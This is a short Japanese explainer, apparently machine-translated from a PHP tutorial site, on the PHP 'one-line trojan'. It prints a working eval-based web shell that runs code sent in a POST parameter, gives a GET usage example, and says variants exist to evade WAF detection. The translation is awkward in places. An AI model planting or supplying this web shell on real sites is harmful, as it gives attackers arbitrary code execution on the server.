PHPポニーとは何ですか

#phpPony とは何ですか?

php Xiaoma も一言でトロイの木馬ですが、これは 1 行のコードだけを必要とするトロイの木馬を指します。たった 1 行のコードで、大きなトロイの木馬と同じ機能を実現できます。馬。 WAF の検出を回避するために、この一文のトロイの木馬は無数のバリエーションで登場しましたが、トロイの木馬の機能が送信されたコマンドを実行するという本質は同じです。

コマンドはどのように送信され、送信されたコマンドはどのように実行されるのでしょうか?

GET、POST、COOKIE という 3 つの方法でデータを Web サイトに送信できます。一文のトロイの木馬は、$_GET[' ']、$_POST[' ']、$_COOKIE を使用します。 [' ' ] 渡したデータを受け取り、受け取ったデータを一文トロイの木馬のコマンドを実行する関数に渡し、コマンドを実行します。

したがって、あなたが目にする古典的な 1 文のトロイの木馬のほとんどは 2 つの部分しか持っていません。1 つはコードを実行できる関数部分で、もう 1 つはデータを受信する部分です。

例:

<?php eval(@$_POST[&#39;a&#39;]); ?>

ここで、eval はコマンドを実行する関数、$_POST['a'] は受信したデータです。 eval 関数は、受信したデータを PHP コードとして実行します。このようにして、1 文のトロイの木馬が挿入された Web サイトに、渡した任意の PHP ステートメントを実行させることができます。これが、一文のトロイの木馬の威力です。

例:

トロイの木馬は投稿リクエスト ($_POST['a']) で「a」のデータを受け取るため、投稿する必要があります。メソッドはデータを送信し、実行したいコードを「a」に割り当てます。トロイの木馬の post を get に置き換える場合、GET メソッドで "a" を送信する必要があります (http://127.0.0.1/test.php?a=phpinfo(); のように)。再度デモンストレーションします。

PHP の詳細については、

PHP 中国語 Web サイト をご覧ください。

以上がPHPポニーとは何ですかの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。